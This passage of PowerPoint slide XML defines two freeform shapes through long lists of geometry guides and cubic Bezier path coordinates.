                  <a:gd name="connsiteY19" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX32" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY32" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX33" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY33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6828 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 906043 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1137212 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY31" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX32" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY32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137212 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 902677 h 1639479"/>
                  <a:gd name="connsiteX14" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 983823 h 1639479"/>
                  <a:gd name="connsiteX15" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 1144402 h 1639479"/>
                  <a:gd name="connsiteX16" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 1328410 h 1639479"/>
                  <a:gd name="connsiteX17" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1488418 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 651683 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1630737 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX30" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY30" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX31" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY31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34660 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1639121 h 1639479"/>
                  <a:gd name="connsiteX18" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX19" fmla="*/ 634903 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1634709 h 1639479"/>
                  <a:gd name="connsiteX20" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1638710 h 1639479"/>
                  <a:gd name="connsiteX21" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1575850 h 1639479"/>
                  <a:gd name="connsiteX22" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1515847 h 1639479"/>
                  <a:gd name="connsiteX23" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 1154688 h 1639479"/>
                  <a:gd name="connsiteX24" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 779814 h 1639479"/>
                  <a:gd name="connsiteX25" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 587805 h 1639479"/>
                  <a:gd name="connsiteX26" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 544375 h 1639479"/>
                  <a:gd name="connsiteX27" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 250647 h 1639479"/>
                  <a:gd name="connsiteX28" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 37495 h 1639479"/>
                  <a:gd name="connsiteX29" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY29" fmla="*/ 279 h 1639479"/>
                  <a:gd name="connsiteX0" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 913732 h 1643351"/>
                  <a:gd name="connsiteX1" fmla="*/ 1144712 w 1205803"/>
                  <a:gd name="connsiteY1" fmla="*/ 913749 h 1643351"/>
                  <a:gd name="connsiteX2" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY2" fmla="*/ 913732 h 1643351"/>
                  <a:gd name="connsiteX3" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY3" fmla="*/ 279 h 1643351"/>
                  <a:gd name="connsiteX4" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY4" fmla="*/ 41495 h 1643351"/>
                  <a:gd name="connsiteX5" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY5" fmla="*/ 212931 h 1643351"/>
                  <a:gd name="connsiteX6" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY6" fmla="*/ 511802 h 1643351"/>
                  <a:gd name="connsiteX7" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY7" fmla="*/ 473514 h 1643351"/>
                  <a:gd name="connsiteX8" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY8" fmla="*/ 527231 h 1643351"/>
                  <a:gd name="connsiteX9" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 770099 h 1643351"/>
                  <a:gd name="connsiteX10" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 867246 h 1643351"/>
                  <a:gd name="connsiteX11" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 910677 h 1643351"/>
                  <a:gd name="connsiteX12" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 906043 h 1643351"/>
                  <a:gd name="connsiteX13" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 983823 h 1643351"/>
                  <a:gd name="connsiteX14" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 1144402 h 1643351"/>
                  <a:gd name="connsiteX15" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 1328410 h 1643351"/>
                  <a:gd name="connsiteX16" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 1488418 h 1643351"/>
                  <a:gd name="connsiteX17" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1639121 h 1643351"/>
                  <a:gd name="connsiteX18" fmla="*/ 634332 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1638710 h 1643351"/>
                  <a:gd name="connsiteX19" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1638710 h 1643351"/>
                  <a:gd name="connsiteX20" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1575850 h 1643351"/>
                  <a:gd name="connsiteX21" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1515847 h 1643351"/>
                  <a:gd name="connsiteX22" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 1154688 h 1643351"/>
                  <a:gd name="connsiteX23" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 779814 h 1643351"/>
                  <a:gd name="connsiteX24" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 587805 h 1643351"/>
                  <a:gd name="connsiteX25" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 544375 h 1643351"/>
                  <a:gd name="connsiteX26" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 250647 h 1643351"/>
                  <a:gd name="connsiteX27" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 37495 h 1643351"/>
                  <a:gd name="connsiteX28" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY28" fmla="*/ 279 h 1643351"/>
                  <a:gd name="connsiteX0" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY0" fmla="*/ 913732 h 1639121"/>
                  <a:gd name="connsiteX1" fmla="*/ 1144712 w 1205803"/>
                  <a:gd name="connsiteY1" fmla="*/ 913749 h 1639121"/>
                  <a:gd name="connsiteX2" fmla="*/ 1144717 w 1205803"/>
                  <a:gd name="connsiteY2" fmla="*/ 913732 h 1639121"/>
                  <a:gd name="connsiteX3" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY3" fmla="*/ 279 h 1639121"/>
                  <a:gd name="connsiteX4" fmla="*/ 789196 w 1205803"/>
                  <a:gd name="connsiteY4" fmla="*/ 41495 h 1639121"/>
                  <a:gd name="connsiteX5" fmla="*/ 983490 w 1205803"/>
                  <a:gd name="connsiteY5" fmla="*/ 212931 h 1639121"/>
                  <a:gd name="connsiteX6" fmla="*/ 1046350 w 1205803"/>
                  <a:gd name="connsiteY6" fmla="*/ 511802 h 1639121"/>
                  <a:gd name="connsiteX7" fmla="*/ 1094353 w 1205803"/>
                  <a:gd name="connsiteY7" fmla="*/ 473514 h 1639121"/>
                  <a:gd name="connsiteX8" fmla="*/ 1157213 w 1205803"/>
                  <a:gd name="connsiteY8" fmla="*/ 527231 h 1639121"/>
                  <a:gd name="connsiteX9" fmla="*/ 1205786 w 1205803"/>
                  <a:gd name="connsiteY9" fmla="*/ 770099 h 1639121"/>
                  <a:gd name="connsiteX10" fmla="*/ 1174927 w 1205803"/>
                  <a:gd name="connsiteY10" fmla="*/ 867246 h 1639121"/>
                  <a:gd name="connsiteX11" fmla="*/ 1146926 w 1205803"/>
                  <a:gd name="connsiteY11" fmla="*/ 910677 h 1639121"/>
                  <a:gd name="connsiteX12" fmla="*/ 1146828 w 1205803"/>
                  <a:gd name="connsiteY12" fmla="*/ 906043 h 1639121"/>
                  <a:gd name="connsiteX13" fmla="*/ 1054922 w 1205803"/>
                  <a:gd name="connsiteY13" fmla="*/ 983823 h 1639121"/>
                  <a:gd name="connsiteX14" fmla="*/ 1055494 w 1205803"/>
                  <a:gd name="connsiteY14" fmla="*/ 1144402 h 1639121"/>
                  <a:gd name="connsiteX15" fmla="*/ 992634 w 1205803"/>
                  <a:gd name="connsiteY15" fmla="*/ 1328410 h 1639121"/>
                  <a:gd name="connsiteX16" fmla="*/ 853770 w 1205803"/>
                  <a:gd name="connsiteY16" fmla="*/ 1488418 h 1639121"/>
                  <a:gd name="connsiteX17" fmla="*/ 634660 w 1205803"/>
                  <a:gd name="connsiteY17" fmla="*/ 1639121 h 1639121"/>
                  <a:gd name="connsiteX18" fmla="*/ 550328 w 1205803"/>
                  <a:gd name="connsiteY18" fmla="*/ 1638710 h 1639121"/>
                  <a:gd name="connsiteX19" fmla="*/ 456609 w 1205803"/>
                  <a:gd name="connsiteY19" fmla="*/ 1575850 h 1639121"/>
                  <a:gd name="connsiteX20" fmla="*/ 417179 w 1205803"/>
                  <a:gd name="connsiteY20" fmla="*/ 1515847 h 1639121"/>
                  <a:gd name="connsiteX21" fmla="*/ 161167 w 1205803"/>
                  <a:gd name="connsiteY21" fmla="*/ 1154688 h 1639121"/>
                  <a:gd name="connsiteX22" fmla="*/ 23447 w 1205803"/>
                  <a:gd name="connsiteY22" fmla="*/ 779814 h 1639121"/>
                  <a:gd name="connsiteX23" fmla="*/ 17 w 1205803"/>
                  <a:gd name="connsiteY23" fmla="*/ 587805 h 1639121"/>
                  <a:gd name="connsiteX24" fmla="*/ 589 w 1205803"/>
                  <a:gd name="connsiteY24" fmla="*/ 544375 h 1639121"/>
                  <a:gd name="connsiteX25" fmla="*/ 77164 w 1205803"/>
                  <a:gd name="connsiteY25" fmla="*/ 250647 h 1639121"/>
                  <a:gd name="connsiteX26" fmla="*/ 393178 w 1205803"/>
                  <a:gd name="connsiteY26" fmla="*/ 37495 h 1639121"/>
                  <a:gd name="connsiteX27" fmla="*/ 598259 w 1205803"/>
                  <a:gd name="connsiteY27" fmla="*/ 279 h 1639121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05803" h="1638710">
                    <a:moveTo>
                      <a:pt x="1144717" y="913732"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1144712" y="913749"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1144714" y="913743"/>
                      <a:pt x="1144715" y="913738"/>
                      <a:pt x="1144717" y="913732"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="598259" y="279"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="665333" y="2493"/>
                      <a:pt x="730051" y="17780"/>
                      <a:pt x="789196" y="41495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="916630" y="92926"/>
                      <a:pt x="983490" y="212931"/>
                      <a:pt x="983490" y="212931"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1040636" y="292935"/>
                      <a:pt x="1027492" y="544946"/>
                      <a:pt x="1046350" y="511802"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1059494" y="494658"/>
                      <a:pt x="1070351" y="475800"/>
                      <a:pt x="1094353" y="473514"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126925" y="477514"/>
                      <a:pt x="1148069" y="495801"/>
                      <a:pt x="1157213" y="527231"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1180071" y="606663"/>
                      <a:pt x="1205214" y="685524"/>
                      <a:pt x="1205786" y="770099"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1206357" y="807815"/>
                      <a:pt x="1192642" y="836959"/>
                      <a:pt x="1174927" y="867246"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1165784" y="881533"/>
                      <a:pt x="1156070" y="895819"/>
                      <a:pt x="1146926" y="910677"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1146893" y="909132"/>
                      <a:pt x="1146861" y="907588"/>
                      <a:pt x="1146828" y="906043"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1131494" y="918234"/>
                      <a:pt x="1070144" y="944096"/>
                      <a:pt x="1054922" y="983823"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1054922" y="1037540"/>
                      <a:pt x="1053779" y="1090685"/>
                      <a:pt x="1055494" y="1144402"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1057208" y="1214120"/>
                      <a:pt x="1029778" y="1272408"/>
                      <a:pt x="992634" y="1328410"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="953203" y="1387842"/>
                      <a:pt x="927488" y="1436701"/>
                      <a:pt x="853770" y="1488418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="780052" y="1540135"/>
                      <a:pt x="719629" y="1618712"/>
                      <a:pt x="550328" y="1638710"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="505755" y="1638138"/>
                      <a:pt x="475467" y="1616994"/>
                      <a:pt x="456609" y="1575850"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="446894" y="1554134"/>
                      <a:pt x="434894" y="1531276"/>
                      <a:pt x="417179" y="1515847"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="304603" y="1414128"/>
                      <a:pt x="227456" y="1288980"/>
                      <a:pt x="161167" y="1154688"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155453" y="1141544"/>
                      <a:pt x="32590" y="795814"/>
                      <a:pt x="23447" y="779814"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13161" y="716382"/>
                      <a:pt x="-554" y="652951"/>
                      <a:pt x="17" y="587805"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="573519"/>
                      <a:pt x="17" y="559232"/>
                      <a:pt x="589" y="544375"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6875" y="455799"/>
                      <a:pt x="23447" y="321507"/>
                      <a:pt x="77164" y="250647"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134881" y="174644"/>
                      <a:pt x="273173" y="87211"/>
                      <a:pt x="393178" y="37495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="461753" y="8922"/>
                      <a:pt x="531184" y="-1936"/>
                      <a:pt x="598259" y="27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F702FD0-A8B4-4C32-9207-35BE5189D60A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8541253" y="6031525"/>
                <a:ext cx="1146418" cy="636246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst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180662 w 1167884"/>
                  <a:gd name="connsiteY25" fmla="*/ 39594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30" fmla="*/ 609586 w 1167884"/>
                  <a:gd name="connsiteY30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09751 w 1167884"/>
                  <a:gd name="connsiteY28" fmla="*/ 138 h 651968"/>
                  <a:gd name="connsiteX29" fmla="*/ 609586 w 1167884"/>
                  <a:gd name="connsiteY29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09751 w 1167884"/>
                  <a:gd name="connsiteY27" fmla="*/ 138 h 651968"/>
                  <a:gd name="connsiteX28" fmla="*/ 609586 w 1167884"/>
                  <a:gd name="connsiteY28" fmla="*/ 0 h 651968"/>
                  <a:gd name="connsiteX0" fmla="*/ 436121 w 1167884"/>
                  <a:gd name="connsiteY0" fmla="*/ 9766 h 648160"/>
                  <a:gd name="connsiteX1" fmla="*/ 435279 w 1167884"/>
                  <a:gd name="connsiteY1" fmla="*/ 11299 h 648160"/>
                  <a:gd name="connsiteX2" fmla="*/ 534712 w 1167884"/>
                  <a:gd name="connsiteY2" fmla="*/ 11870 h 648160"/>
                  <a:gd name="connsiteX3" fmla="*/ 637574 w 1167884"/>
                  <a:gd name="connsiteY3" fmla="*/ 34157 h 648160"/>
                  <a:gd name="connsiteX4" fmla="*/ 766723 w 1167884"/>
                  <a:gd name="connsiteY4" fmla="*/ 101017 h 648160"/>
                  <a:gd name="connsiteX5" fmla="*/ 847869 w 1167884"/>
                  <a:gd name="connsiteY5" fmla="*/ 146733 h 648160"/>
                  <a:gd name="connsiteX6" fmla="*/ 966732 w 1167884"/>
                  <a:gd name="connsiteY6" fmla="*/ 190736 h 648160"/>
                  <a:gd name="connsiteX7" fmla="*/ 1167884 w 1167884"/>
                  <a:gd name="connsiteY7" fmla="*/ 226166 h 648160"/>
                  <a:gd name="connsiteX8" fmla="*/ 1109595 w 1167884"/>
                  <a:gd name="connsiteY8" fmla="*/ 251310 h 648160"/>
                  <a:gd name="connsiteX9" fmla="*/ 990733 w 1167884"/>
                  <a:gd name="connsiteY9" fmla="*/ 491892 h 648160"/>
                  <a:gd name="connsiteX10" fmla="*/ 1039307 w 1167884"/>
                  <a:gd name="connsiteY10" fmla="*/ 646756 h 648160"/>
                  <a:gd name="connsiteX11" fmla="*/ 889585 w 1167884"/>
                  <a:gd name="connsiteY11" fmla="*/ 567324 h 648160"/>
                  <a:gd name="connsiteX12" fmla="*/ 759294 w 1167884"/>
                  <a:gd name="connsiteY12" fmla="*/ 547895 h 648160"/>
                  <a:gd name="connsiteX13" fmla="*/ 566714 w 1167884"/>
                  <a:gd name="connsiteY13" fmla="*/ 489035 h 648160"/>
                  <a:gd name="connsiteX14" fmla="*/ 210126 w 1167884"/>
                  <a:gd name="connsiteY14" fmla="*/ 308455 h 648160"/>
                  <a:gd name="connsiteX15" fmla="*/ 186697 w 1167884"/>
                  <a:gd name="connsiteY15" fmla="*/ 296455 h 648160"/>
                  <a:gd name="connsiteX16" fmla="*/ 124408 w 1167884"/>
                  <a:gd name="connsiteY16" fmla="*/ 323313 h 648160"/>
                  <a:gd name="connsiteX17" fmla="*/ 96978 w 1167884"/>
                  <a:gd name="connsiteY17" fmla="*/ 387316 h 648160"/>
                  <a:gd name="connsiteX18" fmla="*/ 56977 w 1167884"/>
                  <a:gd name="connsiteY18" fmla="*/ 410745 h 648160"/>
                  <a:gd name="connsiteX19" fmla="*/ 18118 w 1167884"/>
                  <a:gd name="connsiteY19" fmla="*/ 373601 h 648160"/>
                  <a:gd name="connsiteX20" fmla="*/ 7260 w 1167884"/>
                  <a:gd name="connsiteY20" fmla="*/ 286169 h 648160"/>
                  <a:gd name="connsiteX21" fmla="*/ 122122 w 1167884"/>
                  <a:gd name="connsiteY21" fmla="*/ 90160 h 648160"/>
                  <a:gd name="connsiteX22" fmla="*/ 147838 w 1167884"/>
                  <a:gd name="connsiteY22" fmla="*/ 71873 h 648160"/>
                  <a:gd name="connsiteX23" fmla="*/ 179482 w 1167884"/>
                  <a:gd name="connsiteY23" fmla="*/ 47944 h 648160"/>
                  <a:gd name="connsiteX24" fmla="*/ 436121 w 1167884"/>
                  <a:gd name="connsiteY24" fmla="*/ 9766 h 648160"/>
                  <a:gd name="connsiteX25" fmla="*/ 609586 w 1167884"/>
                  <a:gd name="connsiteY25" fmla="*/ 0 h 648160"/>
                  <a:gd name="connsiteX26" fmla="*/ 609751 w 1167884"/>
                  <a:gd name="connsiteY26" fmla="*/ 138 h 648160"/>
                  <a:gd name="connsiteX27" fmla="*/ 609586 w 1167884"/>
                  <a:gd name="connsiteY27" fmla="*/ 0 h 64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884" h="648160">
                    <a:moveTo>
                      <a:pt x="436121" y="9766"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="435279" y="11299"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="470138" y="7299"/>
                      <a:pt x="502139" y="17585"/>
                      <a:pt x="534712" y="11870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="571285" y="5585"/>
                      <a:pt x="606144" y="13585"/>
                      <a:pt x="637574" y="34157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="678147" y="61587"/>
                      <a:pt x="722149" y="82159"/>
                      <a:pt x="766723" y="101017"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="795295" y="113018"/>
                      <a:pt x="822154" y="129019"/>
                      <a:pt x="847869" y="146733"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="883871" y="171306"/>
                      <a:pt x="923873" y="185021"/>
                      <a:pt x="966732" y="190736"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1014734" y="197593"/>
                      <a:pt x="1135882" y="216451"/>
                      <a:pt x="1167884" y="226166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1160455" y="238738"/>
                      <a:pt x="1121596" y="245595"/>
                      <a:pt x="1109595" y="251310"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1031306" y="289597"/>
                      <a:pt x="982733" y="402174"/>
                      <a:pt x="990733" y="491892"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="998733" y="549037"/>
                      <a:pt x="1005591" y="599325"/>
                      <a:pt x="1039307" y="646756"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1022449" y="659328"/>
                      <a:pt x="936254" y="583801"/>
                      <a:pt x="889585" y="567324"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="842916" y="550847"/>
                      <a:pt x="803867" y="546180"/>
                      <a:pt x="759294" y="547895"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="693577" y="533037"/>
                      <a:pt x="627859" y="519893"/>
                      <a:pt x="566714" y="489035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="447851" y="428461"/>
                      <a:pt x="319274" y="388459"/>
                      <a:pt x="210126" y="308455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="202697" y="303312"/>
                      <a:pt x="195268" y="299884"/>
                      <a:pt x="186697" y="296455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151838" y="281597"/>
                      <a:pt x="137552" y="288454"/>
                      <a:pt x="124408" y="323313"/>
